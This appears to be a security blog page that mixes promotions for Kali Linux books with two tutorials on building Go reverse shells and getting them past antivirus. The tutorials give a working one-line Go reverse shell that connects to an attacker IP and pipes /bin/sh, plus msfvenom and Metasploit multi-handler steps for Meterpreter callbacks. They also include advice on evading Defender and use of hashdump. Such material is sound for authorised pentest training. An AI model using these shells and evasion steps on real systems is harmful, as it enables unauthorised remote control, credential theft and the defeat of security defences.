My #1 New Release, “Password Cracking with Kali Linux” is out! The latest addition to my Security Testing with Kali Linux series is here!
Unlock the secrets of Windows password security with “Password Cracking with Kali Linux,” your ultimate guide to password cracking using Kali Linux. This book provides a comprehensive introduction to the fundamentals of Windows security, offering readers an in-depth exploration of tools, techniques, and strategies for password cracking.
From understanding the basics of Windows security to creating powerful wordlists for cracking tools, this book is a must-have for both novice and experienced cybersecurity enthusiasts. Learn the art of password cracking as you explore the tools, tactics, and techniques used by both security professionals and real-world attackers. This learn by doing book will help you gain hands-on experience in cracking Windows and Linux passwords using Kali Linux.
The latest in my, “Security Testing with Kali Linux” series, this book focuses solely on cracking password hashes, a critical skill for all Red Team members, Offensive Security Professionals, Pentesters, and Security Enthusiasts. It is a complete collection of all my writings on Password Cracking, taken from my books and articles, modified with additional new information and tools, and formed into a beginning to end book on password cracking.
Key Features:
Fundamental Windows Security Insights: Gain a solid understanding of Windows security protocols, providing a foundation for effective ethical hacking.
Tool and Technique Exploration: Dive into the world of ethical hacking tools and techniques, exploring Kali Linux’s powerful arsenal to crack Windows passwords.
Wordlist Creation Mastery: Master the art of crafting custom wordlists, a crucial skill for optimizing password-cracking success.
Linux Password Cracking: Extend your knowledge beyond Windows and explore the techniques used to crack Linux passwords, adding versatility to your ethical hacking toolkit.
Defense Strategies: Equip yourself with the knowledge to defend against password attacks. Learn essential cybersecurity practices to secure Windows systems effectively.
Whether you’re a cybersecurity enthusiast, IT professional, or aspiring ethical hacker, “Password Cracking with Kali Linux” empowers you to navigate the complex world of password cracking responsibly and ethically. Take your skills to the next level and become a proficient defender against cyber threats with this comprehensive guide.
Go-Shellcode is a great collection of shellcode runners and utilities, written by Ne0nd0g, the creator of the Merlin C2. Go-Shellcode is nice, because it allows you to run exploit shellcode in Go, using various API call techniques. It’s fast, works great against Anti-Virus, and allows you to use any hex encoded shellcode as a payload, especially ones created with MSFvenom.
Make sure you have Go installed on your Kali system, and then just enter:
Once installed, you know have multiple ways to create shellcode. Navigate to the ‘go-shellcode/cmd’ directory, and you will see a list of shellcode delivery techniques, one per folder. Pick one of the techniques – see the tool GitHub page for descriptions for each one.
Then just modify the main.go file in the corresponding subdirectory, inserting the shellcode that you want to run. Each technique comes default with a “Pop Calculator” shellcode string.
As seen below:
Of course, you don’t have to stick with the Popup Calculator shellcode – though I highly recommend using that on your first attempt. You can use any hex Shellcode that you want, using the following procedure.
Create your shellcode with MsfVenom, using a filetype (-f) of “hex”.
Copy and paste it into the code, replacing the existing shellcode DecodeString number string.
Next build the Go file using the instructions for the individual technique, listed on the GitHub page. When finished, a Windows .exe file will appear in the main directory.
If it is a remote shell, just make sure you have Metasploit multi-handler running to catch the call back.
Finally, copy the shellcode file to the target and run it.
The code layout is very nice, it makes it very easy to pick the API technique you want, then just generate your desired shellcode and drop it in.
The EarlyBird gets the Shell
Let’s run through one of the techniques together. We will use the latest one, Go-Shellcode EarlyBird. To try it out with the default “pop calculator” shellcode, just enter the following from the main “go-shellcode” directory.
This will create the file, “popcalc” in the go-shellcode directory. Just copy this file to our Windows server target and run it. Windows calculator will open – You have successfully exploited a system with the dreaded calculator exploit! If you have never heard about “Popping Calc”, it is a fairly popular pentester joke.
Alright, let’s use a different shellcode. It would be nice to pop up a messagebox on the target instead of a calculator. We can do this easily with Msfvenom and the messagebox payload.
First, generate the hex payload:
In a Kali Linux Terminal, enter, “msfvenom -p windows/x64/messagebox -f hex”
Use your favorite editor to open the main.go file in the EarlyBird directory. Then just copy and paste the hex code into the main.go program, replacing the existing popcalc hex code. Copy the entire HEX code, and paste it over (replacing) the existing HEX shellcode string.
As indicated below:
// Pop Calc Shellcode (x64)
shellcode, errShellcode := hex.DecodeString(“[Place New Hex String HERE]”)
Copy the new Message.exe file to the Windows target and run it.
Proof of exploit – Nice! Okay, that is a pretty generic message, let’s see if we can improve on it. Let’s take a look at the ‘messagebox’ payload.
Open another terminal and start Metasploit (msfconsole)
Type “info windows/x64/messagebox”
Here we see information about the payload, including the Text and Title. This info is pretty generic, so let’s change it. We can set the options on the fly when we generate the payload with msfvenom.
msfvenom -p windows/x64/messagebox TEXT=”Something Evil this Way Comes” TITLE=”HackerBox” -f hex
We set the TEXT and TITLE variables right from the msfvenom command. Let’s see if it worked!
Copy and paste the new shellcode into the main.go program
Generate the code, call it “Messagebox2.exe”
Run it on our Windows target:
Very nice! In some Pentest or Red Team engagements, you just need proof of compromise, so this might work nicely. Let’s take it a step further and use the Go program to create a Meterpreter remote shell.
First, we need to generate the shellcode with msfvenom. Let’s try a different reverse shell, just to change things up a little, “reverse_winhttp”.
Before we run it, we need to start a Multi-handler in Metasploit to catch and respond to the call out.
In Metasploit:
use multi/handler
set payload windows/x64/meterpreter/reverse_winhttp
set LHOST [Kali_IP]
exploit -j
Now copy the winhttp.exe file to your Windows target and run it and we get a remote shell!
Type, “help” to see available meterpreter commands. We can upload or download files, even grab a screenshot or control the webcam. If the remote user is an administer, we can run the meterpreter command, “Hashdump” to grab the user password hashes.
“Screenshare” is a newer Meterpreter command. Running this opens a browser on Kali and forces the remote system to live stream the desktop to the Kali system!
I use Go-Shellcode EarlyBird a lot, it is one of my favorite shells. Remember too, EarlyBird is just one of the APIs that you can use, Go-Shellcode has several! Very recently, AV is catching the staged meterpreter shell even using EarlyBird. What is being caught though, is when the stager calls back to Metasploit and downloads the second part of the shell – the solution? Just use the stageless Meterpreter (windows/x64/meterpreter_reverse_tcp) payload shell! It’s extremely long, but works great in Early Bird!
I’ll leave this up to the reader to try, but this is the multi-handler to catch it:
Want to learn more about how to use Go coding in offensive security? I highly recommend the following two books:
“Security with Go” by John Daneil Leon
“Black Hat Go” by Tom Steele, Chris Patten, and Dan Kottmann
Both books are exceptional and walk you through custom coding many security tools. If you are newer to coding with Go, I recommend starting with “Security with Go”. I think the examples are much easier to follow.
The majority of this article is a direct adaptation of a Chapter from one of my latest books. If you liked this article, and want to learn a lot more about the Techniques, Tactics and Procedures (TTPs) that hackers use, in a step-by-step lab environment – then check out my new book:
Creating Reverse Shells and bypassing Anti-Virus (AV) with Golang. Using Golang in security has become very popular over the last few years. In this article I want to cover several existing Golang scripts that you can use to create Reverse Shells and possibly even bypass Anti-Virus.
This is part one of a two-part series. We will start our journey looking at a one-line reverse shell in Go, and then cover a couple apps that can generate multiple different shells. This article isn’t about writing custom Go scripts or post exploit – what to do after you get a remote shell. It is simply a quick and dirty overview of some existing Go shellcode for Pentesters and Red Teams.
Swissky’s one-line Go shell is up first. This one-line reverse shell works great against Linux based targets. Next, we will look at Girsh, a menu driven script that can create multiple different reverse shells for both Linux and Windows.
In Part 2, we will look at Go-Shellcode, a very good Go reverse shell. At last testing and with the right payload, still bypasses most common Windows Anti-Virus products.
As always, this Article is for Educational & Informational Purposes Only.Never try to Access Systems that you do not have Permission to do so
I used two Kali Linux VMs for this article, one a target and the other an attack system. Golang was already installed on the attacking system. I also used a Windows 11 system and a Windows Server 2022 (not shown) for testing some of the shells.
Swissky Repo – Payload All the Thing, Golang Shell
Swissky’s Github site has a one-line reverse shell for Golang that works great on Linux. All you need is a Netcat listener set up on the attacker system and then run the one liner on the Linux target.
Just set up a Netcat Listener on the Attacking system:
On the target, take the one line Go payload from Swisskeyrepo1 and enter the attacker IP address. Then, run in on the target system.
echo ‘package main;import”os/exec”;import”net”;func main(){c,_:=net.Dial(“tcp”,”[Attacker_IP_Address]:4242″);cmd:=exec.Command(“/bin/sh”);cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}’ > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
As seen below:
If the target system has Golang installed, we immediately get a shell:
Before we continue, there are several Go reverse shells available online and on GitHub that basically just open a simple remote communication shell to Netcat. You don’t have to use Netcat on the attacker system, you can use the Metasploit Framework to catch this type of basic shell.
Yes, it also works for Netcat-like shellcode that is compiled to run on Windows targets as well. Granted it won’t be a Meterpreter shell, just a basic shell, but if the target is Windows based you could try the “upgrade shell to meterpreter” module in Metasploit. Windows Defender does catch and block the “upgrade shell to meterpreter” post module, but other AV products may not.
Let’s take a minute and look at catching a basic Netcat shell with Metasploit.
Catching Netcat (Generic) Shells using Metasploit
You can use the Metasploit framework on your attacker system instead of just using Netcat. To do so, just start Metasploit on your attacking system and use a Multi Handler. For a Linux target you will need the “generic/shell_reverse_tcp” payload. Metasploit loads this as default, but I set it manually just to be sure. Then just enter your attacker IP address as LHOST and enter the port used as LPORT. When all is set, just enter “exploit”.
As seen below:
Now, run the one liner Go attack on the target system again. Metasploit acts like Netcat and completes the remote shell.
The process is the same if the target is Windows based, and you are using a Windows version of a Netcat like shell attack. Just change the payload in Multi Handler to the Windows x64 shell.
As seen below:
Notice the only change is switching from the generic shell to the Windows x64 shell. Using the plain reverse shell payloads in Metasploit, you can catch any of the Netcat shells written in any language, and for any target platform.
Girsh is a quick and easy menu driven remote shell written in Golang. Until recently, the PowerShell module in Girsh did bypass Microsoft Defender and other major AV products. Though Defender catches it now, you may still have some luck with it against other AV products. For this example, we will create a quick Linux shell with it.
Install & Usage
With Golang installed all you need to do is pull Girsh down from GitHub.
A fully updated version of the very popular “Basic Security Testing with Kali Linux” is now available! It is a totally cover to cover edit, using the latest pentesting tools and Ethical Hacking techniques.
My Basic Security book has been an industry standard training guide for about 10 years now. It has been used by universities, all branches of the US military and by training centers and students worldwide. I was flooded with requests to do a tool update, and when I started the update, realized how out of date the previous (2018) version had become.
I reached out to leaders of the security community, government trainers and university professors asking what they would like to see in an updated Basic Kali training book. I took every comment and input to heart and created Basic Security Testing with Kali Linux, 4th Edition!
What’s new:
Complete cover to cover edit
Written for the latest version of Kali Linux
All tools sections have been updated – old tools removed, new tools updated
Older versions of Windows removed, focuses on Windows 10 & 11
More tool explanations and techniques included
What’s the same:
Learn by doing
Hands on, Step-by-Step tutorials
Plenty of pictures to make steps more understandable
Covers the same major topics as the original, but using the latest tools
The new AI Generated front cover!
My goal was to provide a common sense Ethical Hacking how-to manual that would be useful to both new and veteran security professionals. I also tried to keep as much of the original material and “spirit” as possible to help professors who have been using it for years to be very comfortable in using it. Thank you to everyone for your continuous support and feedback, it is greatly appreciated!
So what are you waiting for, check it out! Currently the #1 new release in Computer Operating Systems.
If you enjoy it, check out my Advanced Security Testing with Kali Linux book, released last year!
CYBER ARMS - Computer Security 